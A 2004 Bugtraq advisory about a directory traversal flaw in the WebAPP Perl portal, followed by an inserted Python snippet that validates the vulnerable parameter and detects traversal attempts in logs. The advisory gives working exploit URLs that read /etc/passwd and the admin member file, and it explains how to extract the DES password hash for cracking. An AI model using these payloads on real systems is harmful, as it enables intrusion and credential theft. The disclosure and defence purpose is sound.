
List:       bugtraq
Subject:    WebAPP directory traversal and ability to retrieve the DES
From:       "Jérôme" ATHIAS <jerome.athias () caramail ! com>
Date:       2004-08-24 15:42:51
Message-ID: 20040824154251.21637.qmail () www ! securityfocus ! com

WebAPP is advertised as the internet's most feature-rich,
easy-to-run, Perl-based portal system.
Its home site is at http://www.web-app.org/
Some features are:

   -Easy to Install on standard Unix servers!
      (Windows user-supported only!)
   -User Profiles
   -Message forums
   -Private messaging between members
   -Blog-style News Articles
   -Links and Downloads
   -Customizable themes
   -Multiple language support
   -Flat-file System-NO SQL DATABASE!
   -Membership controls
   -Open source

Several user mods are also available, which range from chat
to e-commerce applications.

Several vulnerabilities in these mods have already been
discovered.



The WebAPP system itself has a serious reverse directory
traversal vulnerability.

Example:

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
(this is their main support site)

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available (I chose the "bugs" section)

4) You'll wind up with the URL
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=bugs"
in the address bar of your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"


5) View the HTML source for the page



A more interesting file to look at would be:
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"


View the HTML source code and scroll down until you come to
the line with:
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It is standard DES-encrypted, so a password cracking program
can be run against it.

Every user has a corresponding .dat file within the
db/members directory.
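As an added defensive example (this is not WebAPP's code; the topics directory and the topic-file naming are assumptions), here is the input check a CGI handler would need on the viewcat parameter to close the hole shown in steps 4 and 5: the decoded value is allow-listed, the NUL byte that %00 decodes to is rejected, and the resolved path is confirmed to stay inside the topics directory.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Assumed location of the topic files; WebAPP's real layout is not on the page.
BASE_DIR = os.path.realpath("/srv/webapp/topics")

# A topic name is a short plain identifier: no dots, slashes or control bytes.
TOPIC_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def safe_topic_path(viewcat: str) -> Optional[str]:
    """Map a decoded viewcat value to a file under BASE_DIR, or return None.

    Two layers: an allow-list on the raw value (this also rejects the NUL byte
    that %00 decodes to, which is what truncated the path in the advisory), and
    a realpath containment check so that a symlink, or an encoding the regex
    did not anticipate, still cannot escape BASE_DIR.
    """
    if "\x00" in viewcat or not TOPIC_NAME.fullmatch(viewcat):
        return None
    candidate = os.path.realpath(os.path.join(BASE_DIR, viewcat + ".dat"))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate


def topic_path_from_query(raw_param: str) -> Optional[str]:
    """Decode the parameter the way a CGI library would, then validate it."""
    return safe_topic_path(unquote(raw_param))


def looks_like_traversal(raw_param: str) -> bool:
    """Detection helper for access logs: true for values worth alerting on."""
    decoded = unquote(raw_param)
    return any(marker in decoded for marker in ("..", "/", "\\", "\x00"))


if __name__ == "__main__":
    # Constructed inputs, using the shapes of the URLs quoted above.
    for value in ("bugs", "../../../../../../../etc/passwd%00",
                  "../../db/members/admin.dat%00"):
        print(value, "->", topic_path_from_query(value),
              "| suspicious:", looks_like_traversal(value))
```

The same regex-then-realpath pattern applies to any other parameter WebAPP turns into a file name; an allow-list alone is enough for the %00 case, but the containment check is what catches the cases the allow-list was not written for.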


PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and sa mga posers na kupal sa #oneball

